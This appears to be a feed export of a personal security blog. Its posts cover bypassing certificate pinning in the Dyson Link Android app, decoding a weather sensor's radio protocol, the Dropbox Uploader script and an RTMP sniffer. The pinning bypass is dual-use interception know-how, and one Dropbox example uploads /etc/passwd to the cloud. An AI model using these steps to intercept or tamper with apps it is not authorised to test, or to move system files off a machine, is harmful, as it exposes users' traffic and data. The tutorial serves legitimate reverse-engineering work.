Jekyll2017-07-17T14:27:29+02:00https://www.andreafabrizi.it/ITSecAndrea Fabrizi's security blogIntercepting Android apps with burp suite2017-03-16T23:30:00+01:002017-03-16T23:30:00+01:00https://www.andreafabrizi.it/2017/03/16/Intercept android app with burp suite<h3 id="certificate-pinning">Certificate pinning</h3>
<p>What happens when an android app connects to a remote https server?</p>
<p>So, by default the app match the certificate provided by the server with the device’s trust store and check that the
certificate has been generated for the expected hostname. It doesn’t do additional checks, and this of course
can be a security hole as any unsafe certificate can be installed by mistake by the user or by malicious apps,
allowing man-in-the-middle attacks.</p>
<p>The solution adopted by developers is the <strong>certificate pinning</strong>, which consists in embed and forcing the app
to use a specific certificate, which match the one used by the server, ignoring the device’s trust store and thus allowing
the mobile application to successfully connect only to the legitimate server.</p>
<p>This is a very good practice but unfortunately it prevents to debug or reverse engineer the app using tools such Burp Suite.</p>
<h3 id="replace-the-embedded-certificate">Replace the embedded certificate</h3>
<p>For the demostration I will use <a href="https://play.google.com/store/apps/details?id=com.dyson.mobile.android">Dyson Link</a>, andoid app from
<strong><em>Dyson</em></strong>, which I was interested to reverse engineer.</p>
<p>The app uses a series of embedded certificates to verify the authenticity of the remote API server. So let’s start decompiling the app using
<a href="https://ibotpeaches.github.io/Apktool/">apktool</a>.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>andrea@system:~/demo$ java -jar apktool_2.2.2.jar d ./DysonLink_v3.3.1.apk
I: Using Apktool 2.2.2 on DysonLink_v3.3.1.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/andrea/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
</code></pre>
</div>
<p>The result will be the folder <strong><em>DysonLink_v3.3.1</em></strong> containing the decompiled code and the app resources. The folder <strong><em>DysonLink_v3.3.1/assets/</em></strong> contains
our SSL certificates.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>andrea@system:~/demo$ ls -l DysonLink_v3.3.1/assets/
total 120
-rw-rw-r-- 1 3189 Mar 16 16:46 DysonConnectedProductsCNServerAuthenticationIssuingCA.crt.bundle.pem
-rw-rw-r-- 1 3505 Mar 16 16:46 DysonMockServerAuthenticationIssuingCA.crt.cer
-rw-rw-r-- 1 3188 Mar 16 16:46 DysonProdEnvsConnectedProductsCNServerAuthenticationIssuingCA.crt.bundle.pem
-rw-rw-r-- 1 2518 Mar 16 16:46 DysonProdEnvsConnectedProductsServerAuthenticationIssuingCA.crt.bundle.pem
drwxrwxr-x 2 4096 Mar 16 16:46 fonts
drwxrwxr-x 2 4096 Mar 16 16:46 images
-rw-rw-r-- 1 andrea andrea 38457 Mar 16 16:46 register_configuration.json
-rw-rw-r-- 1 6543 Mar 16 16:46 timezones.json
</code></pre>
</div>
<p>Now let’s fire up Burp Suite, export the CA certificate using the GUI or pointing the browser to <strong><em>http://burp/</em></strong>. The certificate is in DER format, which we need
to convert to PEM.</p>
<div class="highlighter-rouge"><pre class="highlight"><code>openssl x509 -inform der -in cacert.der -out cacert.pem
</code></pre>
</div>
<p>We will use the new generated certificate to replace all the <strong><em>pem</em></strong> files in the <strong><em>assets</em></strong> folder.</p>
<h3 id="repack-the-app">Repack the app</h3>
<p>Recreate the apk from the sorce folder:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>andrea@system:~/demo$ java -jar apktool_2.2.2.jar b -o DysonLink_new.apk DysonLink_v3.3.1
I: Using Apktool 2.2.2
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: warning: string 'connection_connect_ap_app_to_robot_description_single' has no default translation.
W: warning: string 'connection_connect_ap_app_to_robot_title_single' has no default translation.
W: warning: string 'connection_journey_carousel_no_blue_light' has no default translation.
W: warning: string 'connection_journey_carousel_robot_blue_light_description' has no default translation.
W: warning: string 'connection_journey_carousel_robot_dock_description' has no default translation.
W: warning: string 'connection_journey_carousel_robot_title' has no default translation.
W: warning: string 'connection_journey_carousel_robot_wifi_light_description' has no default translation.
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
</code></pre>
</div>
<h3 id="sign-the-apk">Sign the apk</h3>
<p>Generate a new keytore for the signing procedure:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>keytool -genkey -keystore test.keystore -validity 10000 -alias test
</code></pre>
</div>
<p>Sign the forged apk:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>jarsigner -keystore test.keystore -verbose DysonLink_new.apk test
</code></pre>
</div>
<h3 id="test-it">Test it!</h3>
<p>Now we are ready to install it in our emulator. First let’s start it, with the correct proxy settings to point to Burp Suite:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>./emulator -netdelay none -netspeed full -http-proxy http://127.0.0.1:8118 -avd Nexus_5_API_23
</code></pre>
</div>
<p>Install the forged apk (remember to uninstall the original one before):</p>
<div class="highlighter-rouge"><pre class="highlight"><code>adb install DysonLink_new.apk
</code></pre>
</div>
<p>And… as soon we will try to open the app we will see the https traffing passing through Burp Suite!</p>Andrea FabriziCertificate pinningLuxembourg weather stats2016-09-28T14:00:00+02:002016-09-28T14:00:00+02:00https://www.andreafabrizi.it/2016/09/28/Luxembourg weather<p>Using the <a href="/2016/09/09/Bresser-Weather-Center/">Bresser library</a> I’ve developed, I started a little project to collect weather
information in the place where I live and graph real time and historycal data.</p>
<p>The statistics are available at <a href="https://airquality.andreafabrizi.it/">https://airquality.andreafabrizi.it/</a></p>
<p>The original project name was <strong>airquality</strong> because I was also collecting PM2.5 and PM10 samples (and calculating the relative AQI)
using the <a href="http://www.dylosproducts.com/dcproairqumo.html">Dylos DC1100 PRO</a> particle counter. For the moment it’s not running anymore
because I’ve to find a better place where to put it outside.</p>Andrea FabriziUsing the Bresser library I’ve developed, I started a little project to collect weather
information in the place where I live and graph real time and historycal data.Bresser Weather Center2016-09-09T14:00:00+02:002016-09-09T14:00:00+02:00https://www.andreafabrizi.it/2016/09/09/Bresser Weather Center<h1 id="bresser-weather-center">Bresser Weather Center</h1>
<p>The <a href="http://www.bresser.de/en/Weather-Time/BRESSER-Weather-Center-5-in-1.html">BRESSER weather center 5-in-1</a> (model 7002510) outdoor sensor transfers all measured values for wind speed, wind direction, humidity, temperature and precipitation rate to the base station using radio signals and a proprietary protocol.</p>
<p>This library decodes the readings sent by the Bresser sensors. I tested it only with a RTL2838 dongle, using the rtl-sdr software (<a href="http://www.rtl-sdr.com/">http://www.rtl-sdr.com/</a>).</p>
<p>Note that I’ve not fully reversed yet the data packed sent by the sensor, the work is still ongoing and the library still need to be tested a lot.</p>
<h2 id="reversing-and-packet-structure">Reversing and packet structure</h2>
<p>The sensor transmit the packet on the 868.300M frequency with AM modulation.</p>
<p>Following a capture of the wave already demodulated:</p>
<p><img src="https://www.andreafabrizi.it/img/bresser_radio_signal.png" alt="Radio Signal" title="Radio wave" /></p>
<p>The packet is 264 bits long and the bits are ecoded with 1 for high and 0 for low. The data should be read as nybble (half byte) in BCD format.</p>
<p>With the sampling rate set to 48Khz we have an average of 6 samples per bit.</p>
<p>Following the packet structure I’ve reversed so far, not highlighted the parts who still need to be identified.</p>
<p><img src="https://www.andreafabrizi.it/img/bresser_packet.png" alt="Packet structure" /></p>
<p>The checksum is just a XOR of the following data.</p>
<h2 id="get-the-code">Get the code</h2>
<p>Visit the project page on <a href="https://github.com/andreafabrizi/BresserWeatherCenter">GitHub</a> or get the code with the command:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/BresserWeatherCenter.git
</code></pre>
</div>
<h2 id="simple-usage">Simple usage</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>from bresser import *
#The noise value should be manually adjusted for the moment
b = Bresser(printdata=True, noise = 700)
b.process_radio_data()
</code></pre>
</div>
<div class="highlighter-rouge"><pre class="highlight"><code>rtl_fm -M am -f 868.300M -s 48k -g 49.6 | ./example.py
2016-09-09 19:59:07: Humidity: 50% Temperature: 20.7° Wind: 2.2 Km/h NNE Rain: 4.0 mm
2016-09-09 19:59:17: Humidity: 50% Temperature: 20.7° Wind: 2.2 Km/h NNE Rain: 4.0 mm
2016-09-09 19:59:30: Humidity: 49% Temperature: 20.6° Wind: 2.2 Km/h NNE Rain: 4.0 mm
</code></pre>
</div>
<h2 id="advanced-usage">Advanced usage</h2>
<div class="highlighter-rouge"><pre class="highlight"><code>from bresser import *
def process_packet(p):
print "Humidity: %d%% " % p.getHumidity(),
print "Temperature: %.1f" % p.getTemperature() + u"\u00b0 ",
print "Wind: %.1f m/s %s" % (p.getWindSpeed(), p.getWindDirection()),
print "Rain: %.1f mm" % p.getRain(),
print ""
if __name__ == "__main__":
#Noise neede to be adjusted manually
b = Bresser(noise = 700)
b.set_callback(process_packet)
b.process_radio_data()
</code></pre>
</div>
<div class="highlighter-rouge"><pre class="highlight"><code>rtl_fm -M am -f 868.300M -s 48k -g 49.6 | ./example.py
Humidity: 91% Temperature: 6.4° Wind: 0.0 m/s E Rain: 78.8 mm
Humidity: 91% Temperature: 6.4° Wind: 0.0 m/s E Rain: 78.8 mm
Humidity: 91% Temperature: 6.5° Wind: 0.0 m/s E Rain: 78.8 mm
</code></pre>
</div>
<p>Note that most probably the gain and the frequency needs to be adjusted, depending on your device and antenna.</p>
<h2 id="antenna">Antenna</h2>
<p>As antenna I used a self made metal wire 8.64 cm long (300000/868000/4) and it works quite well.</p>
<h2 id="to-do">To do</h2>
<ul>
<li>Remove dependency from rtl_fm using pyrtlsdr</li>
<li>Implement an automatic noise detection</li>
</ul>Andrea FabriziBresser Weather Center
The BRESSER weather center 5-in-1 (model 7002510) outdoor sensor transfers all measured values for wind speed, wind direction, humidity, temperature and precipitation rate to the base station using radio signals and a proprietary protocol.
This library decodes the readings sent by the Bresser sensors. I tested it only with a RTL2838 dongle, using the rtl-sdr software (http://www.rtl-sdr.com/).
Note that I’ve not fully reversed yet the data packed sent by the sensor, the work is still ongoing and the library still need to be tested a lot.
Reversing and packet structure
The sensor transmit the packet on the 868.300M frequency with AM modulation.
Following a capture of the wave already demodulated:
The packet is 264 bits long and the bits are ecoded with 1 for high and 0 for low. The data should be read as nybble (half byte) in BCD format.
With the sampling rate set to 48Khz we have an average of 6 samples per bit.
Following the packet structure I’ve reversed so far, not highlighted the parts who still need to be identified.
The checksum is just a XOR of the following data.
Get the code
Visit the project page on GitHub or get the code with the command:
git clone https://github.com/andreafabrizi/BresserWeatherCenter.git
Simple usage
from bresser import *
#The noise value should be manually adjusted for the moment
b = Bresser(printdata=True, noise = 700)
b.process_radio_data()
rtl_fm -M am -f 868.300M -s 48k -g 49.6 | ./example.py
2016-09-09 19:59:07: Humidity: 50% Temperature: 20.7° Wind: 2.2 Km/h NNE Rain: 4.0 mm
2016-09-09 19:59:17: Humidity: 50% Temperature: 20.7° Wind: 2.2 Km/h NNE Rain: 4.0 mm
2016-09-09 19:59:30: Humidity: 49% Temperature: 20.6° Wind: 2.2 Km/h NNE Rain: 4.0 mm
Advanced usage
from bresser import *
def process_packet(p):
print "Humidity: %d%% " % p.getHumidity(),
print "Temperature: %.1f" % p.getTemperature() + u"\u00b0 ",
print "Wind: %.1f m/s %s" % (p.getWindSpeed(), p.getWindDirection()),
print "Rain: %.1f mm" % p.getRain(),
print ""
if __name__ == "__main__":
#Noise neede to be adjusted manually
b = Bresser(noise = 700)
b.set_callback(process_packet)
b.process_radio_data()
rtl_fm -M am -f 868.300M -s 48k -g 49.6 | ./example.py
Humidity: 91% Temperature: 6.4° Wind: 0.0 m/s E Rain: 78.8 mm
Humidity: 91% Temperature: 6.4° Wind: 0.0 m/s E Rain: 78.8 mm
Humidity: 91% Temperature: 6.5° Wind: 0.0 m/s E Rain: 78.8 mm
Note that most probably the gain and the frequency needs to be adjusted, depending on your device and antenna.
Antenna
As antenna I used a self made metal wire 8.64 cm long (300000/868000/4) and it works quite well.
To do
Remove dependency from rtl_fm using pyrtlsdr
Implement an automatic noise detectionDropbox Uploader2016-01-01T13:00:00+01:002016-01-01T13:00:00+01:00https://www.andreafabrizi.it/2016/01/01/Dropbox Uploader<h1 id="dropbox-uploader">Dropbox Uploader</h1>
<p>Dropbox Uploader is a <strong>BASH</strong> script which can be used to upload, download, delete, list files (and more!) from <strong>Dropbox</strong>, an online file sharing, synchronization and backup service.</p>
<p>It’s written in BASH scripting language and only needs <strong>cURL</strong>.</p>
<p>You can take a look to the <a href="https://github.com/andreafabrizi/Dropbox-Uploader">GiHub project page</a>.</p>
<p><strong>Why use this script?</strong></p>
<ul>
<li><strong>Portable:</strong> It’s written in BASH scripting and only needs <code class="highlighter-rouge">cURL</code> (curl is a tool to transfer data from or to a server, available for all operating systems and installed by default in many linux distributions).</li>
<li><strong>Secure:</strong> It’s not required to provide your username/password to this script, because it uses the official Dropbox API v2 for the authentication process.</li>
</ul>
<p>Please refer to the <a href="https://github.com/andreafabrizi/Dropbox-Uploader/wiki">Wiki</a> for tips and additional information about this project. The Wiki is also the place where you can share your scripts and examples related to Dropbox Uploader.</p>
<h2 id="features">Features</h2>
<ul>
<li>Cross platform</li>
<li>Support for the official Dropbox API v2</li>
<li>No password required or stored</li>
<li>Simple step-by-step configuration wizard</li>
<li>Simple and chunked file upload</li>
<li>File and recursive directory download</li>
<li>File and recursive directory upload</li>
<li>Shell wildcard expansion (only for upload)</li>
<li>Delete/Move/Rename/Copy/List/Share files</li>
<li>Create share link</li>
<li>Monitor for changes</li>
</ul>
<h2 id="getting-started">Getting started</h2>
<p>First, clone the repository using git (recommended):</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>git clone https://github.com/andreafabrizi/Dropbox-Uploader.git
</code></pre>
</div>
<p>or download the script manually using this command:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>curl <span class="s2">"https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh"</span> -o dropbox_uploader.sh
</code></pre>
</div>
<p>Then give the execution permission to the script and run it:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> <span class="nv">$chmod</span> +x dropbox_uploader.sh
<span class="nv">$.</span>/dropbox_uploader.sh
</code></pre>
</div>
<p>The first time you run <code class="highlighter-rouge">dropbox_uploader</code>, you’ll be guided through a wizard in order to configure access to your Dropbox. This configuration will be stored in <code class="highlighter-rouge">~/.dropbox_uploader</code>.</p>
<h2 id="usage">Usage</h2>
<p>The syntax is quite simple:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>./dropbox_uploader.sh [PARAMETERS] COMMAND...
[%%]: Optional param
<%%>: Required param
</code></pre>
</div>
<p><strong>Available commands:</strong></p>
<ul>
<li>
<p><strong>upload</strong> <LOCAL_FILE/DIR …> <REMOTE_FILE/DIR><br />
Upload a local file or directory to a remote Dropbox folder.<br />
If the file is bigger than 150Mb the file is uploaded using small chunks (default 50Mb);
in this case a . (dot) is printed for every chunk successfully uploaded and a * (star) if an error
occurs (the upload is retried for a maximum of three times).
Only if the file is smaller than 150Mb, the standard upload API is used, and if the -p option is specified
the default curl progress bar is displayed during the upload process.<br />
The local file/dir parameter supports wildcards expansion.</p>
</li>
<li>
<p><strong>download</strong> <REMOTE_FILE/DIR> [LOCAL_FILE/DIR]<br />
Download file or directory from Dropbox to a local folder</p>
</li>
<li>
<p><strong>delete</strong> <REMOTE_FILE/DIR><br />
Remove a remote file or directory from Dropbox</p>
</li>
<li>
<p><strong>move</strong> <REMOTE_FILE/DIR> <REMOTE_FILE/DIR><br />
Move or rename a remote file or directory</p>
</li>
<li>
<p><strong>copy</strong> <REMOTE_FILE/DIR> <REMOTE_FILE/DIR><br />
Copy a remote file or directory</p>
</li>
<li>
<p><strong>mkdir</strong> <REMOTE_DIR><br />
Create a remote directory on Dropbox</p>
</li>
<li>
<p><strong>list</strong> [REMOTE_DIR]<br />
List the contents of the remote Dropbox folder</p>
</li>
<li>
<p><strong>monitor</strong> [REMOTE_DIR] [TIMEOUT]<br />
Monitor the remote Dropbox folder for changes. If timeout is specified, at the first change event the function will return.</p>
</li>
<li>
<p><strong>share</strong> <REMOTE_FILE><br />
Get a public share link for the specified file or directory</p>
</li>
<li>
<p><strong>saveurl</strong> <URL> <REMOTE_DIR><br />
Download a file from an URL to a Dropbox folder directly (the file is NOT downloaded locally)</p>
</li>
<li>
<p><strong>search</strong> <QUERY>
Search for a specific pattern on Dropbox and returns the list of matching files or directories</p>
</li>
<li>
<p><strong>info</strong><br />
Print some info about your Dropbox account</p>
</li>
<li>
<p><strong>space</strong>
Print some info about the space usage on your Dropbox account</p>
</li>
<li>
<p><strong>unlink</strong><br />
Unlink the script from your Dropbox account</p>
</li>
</ul>
<p><strong>Optional parameters:</strong></p>
<ul>
<li>
<p><strong>-f <FILENAME></strong><br />
Load the configuration file from a specific file</p>
</li>
<li>
<p><strong>-s</strong><br />
Skip already existing files when download/upload. Default: Overwrite</p>
</li>
<li>
<p><strong>-d</strong><br />
Enable DEBUG mode</p>
</li>
<li>
<p><strong>-q</strong><br />
Quiet mode. Don’t show progress meter or messages</p>
</li>
<li>
<p><strong>-h</strong><br />
Show file sizes in human readable format</p>
</li>
<li>
<p><strong>-p</strong><br />
Show cURL progress meter</p>
</li>
<li>
<p><strong>-k</strong><br />
Doesn’t check for SSL certificates (insecure)</p>
</li>
</ul>
<p><strong>Examples:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> ./dropbox_uploader.sh upload /etc/passwd /myfiles/passwd.old
./dropbox_uploader.sh upload <span class="k">*</span>.zip /
./dropbox_uploader.sh download /backup.zip
./dropbox_uploader.sh delete /backup.zip
./dropbox_uploader.sh mkdir /myDir/
./dropbox_uploader.sh upload <span class="s2">"My File.txt"</span> <span class="s2">"My File 2.txt"</span>
./dropbox_uploader.sh share <span class="s2">"My File.txt"</span>
./dropbox_uploader.sh list
</code></pre>
</div>
<h2 id="tested-environments">Tested Environments</h2>
<ul>
<li>GNU Linux</li>
<li>FreeBSD 8.3/10.0</li>
<li>MacOSX</li>
<li>Windows/Cygwin</li>
<li>Raspberry Pi</li>
<li>QNAP</li>
<li>iOS</li>
<li>OpenWRT</li>
<li>Chrome OS</li>
<li>OpenBSD</li>
</ul>
<p>If you have successfully tested this script on others systems or platforms please let me know!</p>
<h2 id="running-as-cron-job">Running as cron job</h2>
<p>Dropbox Uploader relies on a different configuration file for each system user. The default configuration file location is <code class="highlighter-rouge">$HOME/.dropbox_uploader</code>. This means that if you setup the script with your user and then you try to run a cron job as root, it won’t work.
So, when running this script using cron, please keep in mind the following:</p>
<ul>
<li>Remember to setup the script with the user used to run the cron job</li>
<li>Always specify the full script path when running it (e.g. /path/to/dropbox_uploader.sh)</li>
<li>Use always the -f option to specify the full configuration file path, because sometimes in the cron environment the home folder path is not detected correctly (e.g. -f /home/youruser/.dropbox_uploader)</li>
<li>My advice is, for security reasons, to not share the same configuration file with different users</li>
</ul>
<h2 id="how-to-setup-a-proxy">How to setup a proxy</h2>
<p>To use a proxy server, just set the <strong>https_proxy</strong> environment variable:</p>
<p><strong>Linux:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> <span class="nb">export </span><span class="nv">HTTP_PROXY_USER</span><span class="o">=</span>XXXX
<span class="nb">export </span><span class="nv">HTTP_PROXY_PASSWORD</span><span class="o">=</span>YYYY
<span class="nb">export </span><span class="nv">https_proxy</span><span class="o">=</span>http://192.168.0.1:8080
</code></pre>
</div>
<p><strong>BSD:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> setenv HTTP_PROXY_USER XXXX
setenv HTTP_PROXY_PASSWORD YYYY
setenv https_proxy http://192.168.0.1:8080
</code></pre>
</div>
<h2 id="bash-and-curl-installation">BASH and Curl installation</h2>
<p><strong>Debian & Ubuntu Linux:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> sudo apt-get install bash <span class="o">(</span>Probably BASH is already installed on your system<span class="o">)</span>
sudo apt-get install curl
</code></pre>
</div>
<p><strong>BSD:</strong></p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code> <span class="nb">cd</span> /usr/ports/shells/bash <span class="o">&&</span> make install clean
<span class="nb">cd</span> /usr/ports/ftp/curl <span class="o">&&</span> make install clean
</code></pre>
</div>
<p><strong>Cygwin:</strong><br />
You need to install these packages:</p>
<ul>
<li>curl</li>
<li>ca-certificates</li>
<li>dos2unix</li>
</ul>
<p>Before running the script, you need to convert it using the dos2unix command.</p>
<p><strong>Build cURL from source:</strong></p>
<ul>
<li>Download the source tarball from http://curl.haxx.se/download.html</li>
<li>Follow the INSTALL instructions</li>
</ul>
<h2 id="dropshell">DropShell</h2>
<p>DropShell is an interactive DropBox shell, based on DropBox Uploader:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code>DropShell v0.2
The Intractive Dropbox SHELL
Andrea Fabrizi - andrea.fabrizi@gmail.com
Type <span class="nb">help </span><span class="k">for </span>the list of the available commands.
<span class="gp">andrea@Dropbox:/$ </span>ls
<span class="o">[</span>D] 0 Apps
<span class="o">[</span>D] 0 Camera Uploads
<span class="o">[</span>D] 0 Public
<span class="o">[</span>D] 0 scripts
<span class="o">[</span>D] 0 Security
<span class="o">[</span>F] 105843 notes.txt
<span class="gp">andrea@DropBox:/ServerBackup$ </span>get notes.txt
</code></pre>
</div>
<h2 id="running-as-docker-container">Running as Docker Container</h2>
<p>If you have installed docker on your system and don’t want to deal with downloading the script and ensuring the correct curl versions etc., you can run Dropbox-Uploader via docker as well:</p>
<div class="language-bash highlighter-rouge"><pre class="highlight"><code><span class="gp">andrea@Dropbox:/$ </span>docker run -it --rm --user<span class="o">=</span><span class="k">$(</span>id -u<span class="k">)</span>:<span class="k">$(</span>id -g<span class="k">)</span> -v <LOCAL_CONFIG_PATH>:/config -v <YOUR_DATA_DIR_MOUNT> peez/dropbox-uploader <Arguments>
</code></pre>
</div>
<p>This will store the auth token information in the given local directory in <code class="highlighter-rouge"><LOCAL_CONFIG_PATH></code>. To ensure access to your mounted directories it can be important to pass a UID and GID to the docker deamon (as stated in the example by the –user argument)</p>
<p>Using the script with docker makes it also possible to run the script even on windows machines.</p>
<p>To use a proxy, just set the mentioned environment variables via the docker <code class="highlighter-rouge">-e</code> parameter.</p>
<h2 id="related-projects">Related projects</h2>
<p><a href="https://github.com/mDfRg/Thunar-Dropbox-Uploader-plugin/tree/thunar-dropbox/plugins/thunar">thunar-dropbox</a>: A simple extension to Dropbox Uploader that provides a convenient method to share your Dropbox files with one click!</p>
<h2 id="donations">Donations</h2>
<p>If you want to support this project, please consider donating:</p>
<ul>
<li>PayPal: https://www.paypal.me/AndreaFabrizi83</li>
<li>BTC: 1JHCGAMpKqUwBjcT3Kno9Wd5z16K6WKPqG</li>
</ul>Andrea FabriziDropbox Uploader
Dropbox Uploader is a BASH script which can be used to upload, download, delete, list files (and more!) from Dropbox, an online file sharing, synchronization and backup service.
It’s written in BASH scripting language and only needs cURL.
You can take a look to the GiHub project page.
Why use this script?
Portable: It’s written in BASH scripting and only needs cURL (curl is a tool to transfer data from or to a server, available for all operating systems and installed by default in many linux distributions).
Secure: It’s not required to provide your username/password to this script, because it uses the official Dropbox API v2 for the authentication process.
Please refer to the Wiki for tips and additional information about this project. The Wiki is also the place where you can share your scripts and examples related to Dropbox Uploader.
Features
Cross platform
Support for the official Dropbox API v2
No password required or stored
Simple step-by-step configuration wizard
Simple and chunked file upload
File and recursive directory download
File and recursive directory upload
Shell wildcard expansion (only for upload)
Delete/Move/Rename/Copy/List/Share files
Create share link
Monitor for changes
Getting started
First, clone the repository using git (recommended):
git clone https://github.com/andreafabrizi/Dropbox-Uploader.git
or download the script manually using this command:
curl "https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh" -o dropbox_uploader.sh
Then give the execution permission to the script and run it:
$chmod +x dropbox_uploader.sh
$./dropbox_uploader.sh
The first time you run dropbox_uploader, you’ll be guided through a wizard in order to configure access to your Dropbox. This configuration will be stored in ~/.dropbox_uploader.
Usage
The syntax is quite simple:
./dropbox_uploader.sh [PARAMETERS] COMMAND...
[%%]: Optional param
<%%>: Required param
Available commands:
upload <LOCAL_FILE/DIR …> <REMOTE_FILE/DIR>
Upload a local file or directory to a remote Dropbox folder.
If the file is bigger than 150Mb the file is uploaded using small chunks (default 50Mb);
in this case a . (dot) is printed for every chunk successfully uploaded and a * (star) if an error
occurs (the upload is retried for a maximum of three times).
Only if the file is smaller than 150Mb, the standard upload API is used, and if the -p option is specified
the default curl progress bar is displayed during the upload process.
The local file/dir parameter supports wildcards expansion.
download <REMOTE_FILE/DIR> [LOCAL_FILE/DIR]
Download file or directory from Dropbox to a local folder
delete <REMOTE_FILE/DIR>
Remove a remote file or directory from Dropbox
move <REMOTE_FILE/DIR> <REMOTE_FILE/DIR>
Move or rename a remote file or directory
copy <REMOTE_FILE/DIR> <REMOTE_FILE/DIR>
Copy a remote file or directory
mkdir <REMOTE_DIR>
Create a remote directory on Dropbox
list [REMOTE_DIR]
List the contents of the remote Dropbox folder
monitor [REMOTE_DIR] [TIMEOUT]
Monitor the remote Dropbox folder for changes. If timeout is specified, at the first change event the function will return.
share <REMOTE_FILE>
Get a public share link for the specified file or directory
saveurl <URL> <REMOTE_DIR>
Download a file from an URL to a Dropbox folder directly (the file is NOT downloaded locally)
search <QUERY>
Search for a specific pattern on Dropbox and returns the list of matching files or directories
info
Print some info about your Dropbox account
space
Print some info about the space usage on your Dropbox account
unlink
Unlink the script from your Dropbox account
Optional parameters:
-f <FILENAME>
Load the configuration file from a specific file
-s
Skip already existing files when download/upload. Default: Overwrite
-d
Enable DEBUG mode
-q
Quiet mode. Don’t show progress meter or messages
-h
Show file sizes in human readable format
-p
Show cURL progress meter
-k
Doesn’t check for SSL certificates (insecure)
Examples:
./dropbox_uploader.sh upload /etc/passwd /myfiles/passwd.old
./dropbox_uploader.sh upload *.zip /
./dropbox_uploader.sh download /backup.zip
./dropbox_uploader.sh delete /backup.zip
./dropbox_uploader.sh mkdir /myDir/
./dropbox_uploader.sh upload "My File.txt" "My File 2.txt"
./dropbox_uploader.sh share "My File.txt"
./dropbox_uploader.sh list
Tested Environments
GNU Linux
FreeBSD 8.3/10.0
MacOSX
Windows/Cygwin
Raspberry Pi
QNAP
iOS
OpenWRT
Chrome OS
OpenBSD
If you have successfully tested this script on others systems or platforms please let me know!
Running as cron job
Dropbox Uploader relies on a different configuration file for each system user. The default configuration file location is $HOME/.dropbox_uploader. This means that if you setup the script with your user and then you try to run a cron job as root, it won’t work.
So, when running this script using cron, please keep in mind the following:
Remember to setup the script with the user used to run the cron job
Always specify the full script path when running it (e.g. /path/to/dropbox_uploader.sh)
Use always the -f option to specify the full configuration file path, because sometimes in the cron environment the home folder path is not detected correctly (e.g. -f /home/youruser/.dropbox_uploader)
My advice is, for security reasons, to not share the same configuration file with different users
How to setup a proxy
To use a proxy server, just set the https_proxy environment variable:
Linux:
export HTTP_PROXY_USER=XXXX
export HTTP_PROXY_PASSWORD=YYYY
export https_proxy=http://192.168.0.1:8080
BSD:
setenv HTTP_PROXY_USER XXXX
setenv HTTP_PROXY_PASSWORD YYYY
setenv https_proxy http://192.168.0.1:8080
BASH and Curl installation
Debian & Ubuntu Linux:
sudo apt-get install bash (Probably BASH is already installed on your system)
sudo apt-get install curl
BSD:
cd /usr/ports/shells/bash && make install clean
cd /usr/ports/ftp/curl && make install clean
Cygwin:
You need to install these packages:
curl
ca-certificates
dos2unix
Before running the script, you need to convert it using the dos2unix command.
Build cURL from source:
Download the source tarball from http://curl.haxx.se/download.html
Follow the INSTALL instructions
DropShell
DropShell is an interactive DropBox shell, based on DropBox Uploader:
DropShell v0.2
The Intractive Dropbox SHELL
Andrea Fabrizi - andrea.fabrizi@gmail.com
Type help for the list of the available commands.
andrea@Dropbox:/$ ls
[D] 0 Apps
[D] 0 Camera Uploads
[D] 0 Public
[D] 0 scripts
[D] 0 Security
[F] 105843 notes.txt
andrea@DropBox:/ServerBackup$ get notes.txt
Running as Docker Container
If you have installed docker on your system and don’t want to deal with downloading the script and ensuring the correct curl versions etc., you can run Dropbox-Uploader via docker as well:
andrea@Dropbox:/$ docker run -it --rm --user=$(id -u):$(id -g) -v <LOCAL_CONFIG_PATH>:/config -v <YOUR_DATA_DIR_MOUNT> peez/dropbox-uploader <Arguments>
This will store the auth token information in the given local directory in <LOCAL_CONFIG_PATH>. To ensure access to your mounted directories it can be important to pass a UID and GID to the docker deamon (as stated in the example by the –user argument)
Using the script with docker makes it also possible to run the script even on windows machines.
To use a proxy, just set the mentioned environment variables via the docker -e parameter.
Related projects
thunar-dropbox: A simple extension to Dropbox Uploader that provides a convenient method to share your Dropbox files with one click!
Donations
If you want to support this project, please consider donating:
PayPal: https://www.paypal.me/AndreaFabrizi83
BTC: 1JHCGAMpKqUwBjcT3Kno9Wd5z16K6WKPqGrtmpSnoop2014-06-01T14:00:00+02:002014-06-01T14:00:00+02:00https://www.andreafabrizi.it/2014/06/01/RTMPSnoop<h1 id="rtmpsnoop---the-rtmp-sniffer">rtmpSnoop - The RTMP sniffer!</h1>
<p><strong>rtmpSnoop</strong> lets you to sniff RTMP streams from live TV, online channels and straming services and dump the RTMP properties in many formats.
You can analyse both live and dumped streams.</p>
<p>You can take a look at the <a href="https://github.com/andreafabrizi/rtmpSnoop/">GitHub project page</a></p>
<h2 id="features">Features</h2>
<ul>
<li>Live sniffing from one ore more interfaces</li>
<li>Read dumped streams from PCAP files</li>
<li>Dump the RTMP properties in more formats (simple list, m3u entry or rtmpdump syntax)</li>
<li>Easy to use and cross platform!</li>
</ul>
